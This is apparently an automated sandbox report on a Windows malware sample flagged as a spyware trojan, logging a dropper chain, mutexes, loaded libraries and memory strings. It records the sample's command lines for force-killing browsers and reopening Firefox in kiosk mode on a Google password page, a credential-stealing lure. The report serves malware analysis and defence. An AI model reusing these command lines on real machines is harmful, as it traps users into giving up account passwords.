Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@53/34@58/16

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe

File read: C:\Windows\System32\drivers\etc\hosts

Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;Fy6
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;-
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT sum(count) FROM events;9'
Source: a6f0d09f38.exe, 0000000D.00000003.2574863840.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574229742.0000000005BB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT sum(count) FROM events;9
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);

Source: file.exe

Virustotal: Detection: 55%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: a6f0d09f38.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: a6f0d09f38.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: b5da647ae3.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
